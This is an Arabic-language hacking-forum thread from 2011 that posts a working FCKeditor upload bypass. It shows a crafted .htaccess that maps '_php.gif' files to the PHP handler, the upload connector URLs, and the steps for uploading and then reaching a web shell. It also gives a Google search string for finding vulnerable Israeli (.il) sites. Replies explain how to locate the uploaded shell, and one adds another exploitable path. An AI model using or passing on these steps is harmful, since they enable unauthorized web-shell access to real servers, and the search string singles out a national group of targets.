تذكرنــي
التسجيل التعليمات التقويم البحث مشاركات اليوم اجعل كافة الأقسام مقروءة



.:: قسم الثغرات ::. هذا القسم يختص باحدث الثغرات و طرق استغلالها ..

اضافة رد

 
أدوات الموضوع انواع عرض الموضوع

رقم المشاركة : ( 1 )
الصورة الرمزية قراصنة غزة
قراصنة غزة
# لا إلـہ إلا اللَّـــہ محمد رسول اللَّـــہ #
قراصنة غزة غير متواجد حالياً
 
رقم العضوية : 6102
تاريخ التسجيل : Jan 2010
مكان الإقامة :
عدد المشاركات : 13,618
عدد النقاط : 10
قوة التقييم :
# Electronic Jihadist #
افتراضي Bypass all versions FCKeditor with htaccess

كُتب : [ 11-17-2011 - 02:17 PM ]


كود PHP:
In The Name Of GOD 
[+] Title:bypass all versian FCKeditor with htaccess.

[+] 
Date2011 
[+] script:http://sourceforge.net/projects/fckeditor/
[+] Author  pentesters.ir
[+] Website WwW.PenTesters.IR

--------------------------------------------------------- 
1.create a htaccess file:
code
<
FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2.Now upload this htaccess with FCKeditor

http://target.com/FCKeditor/editor/filemanager/upload/test.html 
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/t
est.html

--------------------------------------------------------------------------- 
-------------------
3.Now upload shell.php.gif with FCKeditor.
4.After upload shell.php.gifthe name "shell.php.gif" change to
"shell_php.gif" automatically.

5.http://target.com/anything/shell_php.gif 
6.Now shell is available from server.
--------------------------------------------------------- 
شرح بسيط..

قبل اي شي هذا دورك عشان اسهل عليكم البحث عن مواقع تستخدم FCKeditor
[برنامج تحرير المقالات]

كود PHP:
“site:.il inurl:FCKeditor/editor/” 
نتابع :


أولا قم بانشاء ملف هتكسس (.htaccess)

كود PHP:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch
الان قم برفعه عن طريق FCKeditor



كود PHP:
http://gaza-hacker.net/FCKeditor/editor/filemanager/upload/test.html 
http://gaza-hacker.net/FCKeditor/editor/filemanager/browser/default/connectors/t
est.html 


الان قم برفع الشل shell.php.gif عن طريق FCKeditor

بعد الرفع الشل يتغير اسمه تلقائيا من shell.php.gif الى "shell_php.gif"


الشل الان مرفوع و بامكاننا الاشتغال عليه :


كود PHP:
http://gaza-hacker.net/anything/shell_php.gif 

توقيع : قراصنة غزة


آخر تعديل بواسطة قراصنة غزة ، 11-17-2011 الساعة 02:25 PM
رد مع إقتباس
بياناتي
 رقم المشاركة : ( 2 )
TKL
v!p
رقم العضوية : 22361
تاريخ التسجيل : Sep 2011
مكان الإقامة :
عدد المشاركات : 2,301
عدد النقاط : 10

TKL غير متواجد حالياً

.::أَنْتِ الْجَمَاعَةُ وَلَوْ كُنْتُ وَحَدَّكَ ::.

افتراضي

كُتب : [ 11-17-2011 - 02:29 PM ]


بارك الله فيك اختي
شرح جميل
والبنسبه ل ال FCKeditor
اللي يركبه ه الايام اعتبره مجنون كثرت ثغراته ومشاكله


توقيع : TKL




./اذا استفدت من موضوعي او تعليقي لا تشكرني بل إدعو لوالدتي بالشفاءادخل هنا

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 3 )
Marvel

رقم العضوية : 13516
تاريخ التسجيل : Sep 2010
مكان الإقامة :
عدد المشاركات : 4,093
عدد النقاط : 10

Marvel غير متواجد حالياً

افتراضي

كُتب : [ 11-17-2011 - 02:41 PM ]


تسلم يدك اختي ع الموضوع ،، ربى يحفظك


توقيع : Marvel

.:: فريق قراصنة غزة ::.

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 4 )
Marvel

رقم العضوية : 13516
تاريخ التسجيل : Sep 2010
مكان الإقامة :
عدد المشاركات : 4,093
عدد النقاط : 10

Marvel غير متواجد حالياً

افتراضي

كُتب : [ 11-17-2011 - 02:43 PM ]


اقتباس
المشاركة الأصلية كتبت بواسطة TKL مشاهدة المشاركة
بارك الله فيك اختي
شرح جميل
والبنسبه ل ال FCKeditor
اللي يركبه ه الايام اعتبره مجنون كثرت ثغراته ومشاكله
لا ياخي ماهو مجنون ولا شي ء لاحظ شي ء بعد مسار الرفع بيكون المرفوع بمجلد

anythingl


اللى عم بيركبو بيغير اسم ملف

anythingl

ووقتها صعب تحصل شلك إلا عن طريق فحص يدوي طويل وممل لمجلدات الموقع وفى ناس تستغني عن مراكز الرفع وتكتفي بالرفع من السى بنل او الافتى بى وضيف اللى مرفوع بشكل يدوي للاسكربت


توقيع : Marvel

.:: فريق قراصنة غزة ::.

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 5 )
قراصنة غزة
# لا إلـہ إلا اللَّـــہ محمد رسول اللَّـــہ #
رقم العضوية : 6102
تاريخ التسجيل : Jan 2010
مكان الإقامة :
عدد المشاركات : 13,618
عدد النقاط : 10

قراصنة غزة غير متواجد حالياً

# Electronic Jihadist #

افتراضي

كُتب : [ 11-17-2011 - 03:05 PM ]


منورين شباب


توقيع : قراصنة غزة

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 6 )
TKL
v!p
رقم العضوية : 22361
تاريخ التسجيل : Sep 2011
مكان الإقامة :
عدد المشاركات : 2,301
عدد النقاط : 10

TKL غير متواجد حالياً

.::أَنْتِ الْجَمَاعَةُ وَلَوْ كُنْتُ وَحَدَّكَ ::.

Talking

كُتب : [ 11-17-2011 - 03:27 PM ]


اقتباس
المشاركة الأصلية كتبت بواسطة Marvel مشاهدة المشاركة
لا ياخي ماهو مجنون ولا شي ء لاحظ شي ء بعد مسار الرفع بيكون المرفوع بمجلد

anythingl


اللى عم بيركبو بيغير اسم ملف

anythingl

ووقتها صعب تحصل شلك إلا عن طريق فحص يدوي طويل وممل لمجلدات الموقع وفى ناس تستغني عن مراكز الرفع وتكتفي بالرفع من السى بنل او الافتى بى وضيف اللى مرفوع بشكل يدوي للاسكربت

يا غالي في الاخر بيقدر يرفع ملف او شل وهاي بحد 1ذذاتها كارثه انا في لحد 2\خمس اشهر فاتت كنت استخدم السكربت في المواقع اللي بشتغلها وهو اساسا كان معتمد عنا في الشركه لكن بعد هيك خلا فتره شهريه طلع فيه اكثر من 4 ثغرات وكلهم ثغرات ابلود

وبالنسبه للمسار سهل جدا تخمنه بتروح لاي موضوع وبتشوف وين مكان الصور او الملفت وبتفتح الشل الخاص فيك

الافضل الواحد يصمم محرر النصوص الخاص فيه يكون اامن واريح وتقدر تعرف نقاط ضعفه

توقيع : TKL




./اذا استفدت من موضوعي او تعليقي لا تشكرني بل إدعو لوالدتي بالشفاءادخل هنا

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 7 )
الغضب
مشرف
رقم العضوية : 4066
تاريخ التسجيل : Dec 2009
مكان الإقامة :
عدد المشاركات : 2,980
عدد النقاط : 10

الغضب غير متواجد حالياً

الغضب

افتراضي

كُتب : [ 11-17-2011 - 04:12 PM ]


مسار جديد من اكتشافي
fckeditor/editor/filemanager/connectors/test.html


توقيع : الغضب

email::::[email protected]
اجمل دورةَ شفتهاَ فقط دقيقتان فقط راح تتعلم كل شي

رد مع إقتباس

اضافة رد

العلامات المرجعية

الكلمات الدلالية (Tags)
bypass, fckeditor, htaccess, versions


يتصفح الموضوع حالياً : 1 (0 قرصان و 1 ضيف)
 
أدوات الموضوع
انواع عرض الموضوع

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
طريقة انشاء صفحة خطأ 404 Htaccess Custom Error قراصنة غزة قسم برمجة لغة Php , Html 9 09-08-2012 09:09 PM
bypass (Priv8) ثغرة بسكربت مقالات bypass حتى رفع شل .. Casper قسم المواضيع المميزة 19 10-30-2011 06:30 PM
ثغرة Bypass في سكربت اسرائيلي YnooF ::. قسم إختراق المواقع والمنتديات .:: 3 11-16-2010 09:48 AM
ثغرة Intellinet IP Camera MNC-L10 Authentication Bypass Vulnerability اليوم mohd9696 .:: قسم الثغرات ::. 2 08-02-2010 02:04 AM
PHP 5.3.0 (main.c) open_basedir bypass mr.le0n .:: قسم الثغرات ::. 0 08-20-2009 09:01 AM


جميع الأوقات بتوقيت GMT +2. الساعة الآن 01:34 PM.



أقسام المنتدى

الأقسام الإسلامية @ .:: القسم الإسلامي العام ::. @ .:: قسم القرآن الكريم وتجويده ::. @ .:: قسم الاناشيد والشريط الاسلامي ::. @ .:: سيرة و قصص الأنبياء و الصحابة ::. @ الأقسام العامة @ .:: قسم الساحة العامة ::. @ .:: قسم فـلـسـطــيــن ::. @ .:: قسم للتوعية الأمنية ::. @ .:: عالم البرامج الكاملة والنادرة ::. @ .:: قسم أخبار التقنية المعلوماتية والتكنولوجية ::. @ .:: قسم عالم المحادثة ::. @ .:: قسم الأمن و الحماية | Security ::. @ ::. قسم حماية الاجهزة والايميلات .:: @ ::. قسم حمايه المواقع والسيرفرات.:: @ ::. قسم إختراق المواقع والأجهزة والبريد الإلكتروني | Hacker .:: @ ::. قسم إختراق المواقع والمنتديات .:: @ ::.قسم إختراق الأجهزه والبريد الاكتروني .:: @ .:: قسم الثغرات ::. @ .:: الركن الترفيهي ::. @ .:: قسم الصور ::. @ .:: ركن الأدارية ::. @ .:: قسم الشكاوي ولأقتراحات ::. @ خاص بشروحات الفيديو @ الأدوات , hack tools @ .:: قسم مساعدة الاعضاء ::. @ :: المواضيع المحذوفة :: @ قسم الانجازات @ .:: جديد قراصنة غزة ::. @ :: قسم استراحة الأعضاء :: @ :: YouTube :: @ .:: القسم التقني ::. @ :: عالمـ الكومبيوتر :: @ :: قسم الجوالات والاتصالات :: @ :: قسم التصميم والغرافيك :: @ خاص للادارة والمشرفين @ :: قسم خاص بالمبتدئين :: @ :: خاص بثغرات المتصفح :: @ :: خاص بشروحات الفيديو :: @ .:: الدورات المقدمة من المشرفين ::. @ :: مشآكل الكومبيوتر وحلولها :: @ .:: للنقاش الجاد ::. @ الملتقى الأدبي .. @ :: طلبات الإشراف :: @ :: كتب الحماية والاختراق security&hacking :: @ البحوث العلمية @ تعليم اللغات الأجنبية @ .:: كتب الكترونية منوعة ::. @ .:: القسم الدعوي ::. @ قسم الكتب الاسلامية @ قسم المواضيع المميزة @ :: قسم خاص بالتشفير :: @ قسم اخبار العالم وقضايا الأمة الإسلامية @ Local root @ دورة إحترآف إلـ Spam Email @ فلسطين , palestine @ .:: مدن وقرى فلسطين ::. @ .:: تاريخ فلسطين ::. @ .:: شهداء فلسطين ::. @ .:: مدينة القدس ::. @ .:: مدينة غزة ::. @ .:: لعروض التصاميم ::. @ .:: لدروس التصاميم ::. @ :: قسم اصدارات وانجازات الفريق :: @ .:: قسم قضية فلسطين ::. @ .:: قسم عروض الاستايلات :.. @ قسم اخبار وقضايا اليهود @ .:: قسم الهاكات وتطوير المنتديات ::. @ ::. قسم المسابقات والنشاطات .:: @ لوحة تحكم سي بانل , cPanel Management @ حماية قواعد البيانات mysql , sql @ لوحة تحكم , Plesk Management @ ادارة سيرفرات Linux @ .:: SQL-injection , حقن قواعد بيانات ::. @ :: قسم خاص بالمبتدئين :: @ .:: قسم الكتب الالكترونية E-BOOK ::. @ .:: قسم تفسير القران الكريم ::. @ قسم الدفاع عن النبي محمد والصحابة وآل البيت @ .:: قسم لغات البرمجة ::. @ قسم برمجة لغة Php , Html @ قسم برمجة لغة mysql , sql @ .:: القسم الرمضانى ::. @ جديد الشيخ نبيل العوضى @ حجب الخدمة , ddos attack @ قسم الاختراق المتقدم @ .:: حماية الاجهزة وطرق كشف التلغيم ::. @ .:: قسم حماية الايميلات :. @ قسم اختراق سيرفرات windows @ .:: دورة قراصنة غزة للتصميم ::. @ .::: أسرى فلسطين ::. @ مدرسة قراصنة غزة لحقن قواعد البيانات @ ::. قسم مشروع الباك تراك backtrack , الميتاسبلويت MetaSploit .:: @ فريق :: Gaza HaCker Injector Team-GHI :: @ دورة أساتذة حقن قواعد البيانات المتقدمة لعام 2017 / 2018 @ GH-InjeCtor-Team @ .:: قسم الصلاة ثم الصلاة ::. @ وَحَرِّضِ الْمُؤْمِنِينَ @ قسم انظمة لينكس Linux, Unix @ قسم الالعاب الالكترونية @ قسم اختراق الشبكات السلكية واللاسلكية @ قسم الميكاترونكس (بناء الروبوتات) @ قسم الدورات المدفوعة @ قسم اختراق الاجهزة اللوحية @ دورات حقن قواعد البيانات للمٌبتدئين من الألف إلى الإحتراف @